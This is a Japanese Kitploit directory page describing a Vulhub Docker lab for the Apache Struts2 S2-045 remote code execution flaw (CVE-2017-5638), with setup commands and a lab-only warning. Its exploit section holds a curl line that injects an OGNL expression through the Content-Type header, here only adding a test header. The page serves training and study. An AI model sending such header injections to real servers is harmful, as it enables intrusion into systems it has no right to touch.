Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
vulhub-struts2 — Vulhub Docker環境を使用して、Apache Struts2(CVE-2017-5638)の重大なリモートコード実行(RCE)脆弱性の悪用を実演する実践的なラボです。セットアップ手順と、脆弱なコンテナを実行するためのコマンドが含まれています。 | Kitploit
ツール/GitHubGitHub/soufiane-benchahyd/vulhub-struts2
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubsoufiane-benchahyd/vulhub-struts2

vulhub-struts2

Vulhub Docker環境を使用して、Apache Struts2(CVE-2017-5638)の重大なリモートコード実行(RCE)脆弱性の悪用を実演する実践的なラボです。セットアップ手順と、脆弱なコンテナを実行するためのコマンドが含まれています。

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apache Struts2 S2-045 リモートコード実行 (CVE-2017-5638)

📌 概要

このプロジェクトは、Apache Struts2 (CVE-2017-5638) におけるリモートコード実行 (RCE) の脆弱性を実演するものです。

攻撃者は、巧妙に細工された HTTP Content-Type ヘッダーを利用して、脆弱なサーバー上で任意のシステムコマンドを実行できます。

このリポジトリは、Vulhub Docker ラボを使用して、脆弱性を安全にテスト・理解できる環境を提供します。


🛠 環境セットアップ

  • ホスト: Ubuntu 24.04 (VirtualBox または ネイティブ)
  • Docker & Docker Compose
  • Vulhub ラボ
  • Apache Struts2 バージョン: 2.3.30

🚀 はじめに

1️⃣ このリポジトリをクローンする

root@kitploit:~
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045

2️⃣ 脆弱なコンテナを起動する

root@kitploit:~
docker compose up -d

3️⃣ コンテナが起動していることを確認する

root@kitploit:~
docker ps

次のような表示が確認できるはずです:

root@kitploit:~
CONTAINER ID   IMAGE                   COMMAND                  STATUS      PORTS
xxxxxxx        vulhub/struts2:2.3.30   "/usr/local/bin/mvn-…"   Up          0.0.0.0:8080->8080/tcp

4️⃣ Web インターフェースをテストする

ブラウザを開いて → http://<VM_IP>:8080 Struts2 アプリケーションのホームページが表示されるはずです。

VM IP の例: 192.168.56.101


💻 エクスプロイト

⚠️ エクスプロイトは管理されたラボ環境でのみ行ってください。絶対に公開サーバーを攻撃しないでください。

脆弱なコンテナに対して、curl や Metasploit などのスクリプトやツールを使って RCE をテストできます。

例 (<command> をテストコマンドに置き換えてください):

root@kitploit:~
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://<VM_IP>:8080/

📝 メモ

  • このラボは安全です: すべての操作は Docker 内で実行されます。
  • テストのスクリーンショットは後で GitHub に追加できます。
  • 学習用ポートフォリオとして、他の Struts2 の脆弱性をこのリポジトリに追加することもできます。

⚡ 参考情報

  • Apache Struts2 S2-045 CVE
  • Vulhub GitHub
ツールをダウンロード